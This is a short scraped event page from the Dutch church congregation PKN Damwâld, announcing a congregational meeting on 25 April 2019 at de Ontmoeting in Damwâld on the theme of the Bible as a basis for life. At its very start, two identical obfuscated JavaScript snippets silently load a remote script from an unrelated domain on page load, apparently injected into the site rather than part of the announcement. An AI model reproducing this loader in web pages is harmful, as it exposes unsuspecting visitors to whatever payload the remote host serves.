;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gemeentevergadering - PKN Damwâld
25 april 2019
19:30 t/m 22:00
de Ontmoeting
Gemeentevergaderingthema is: de Bijbel als basis voor je leven

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld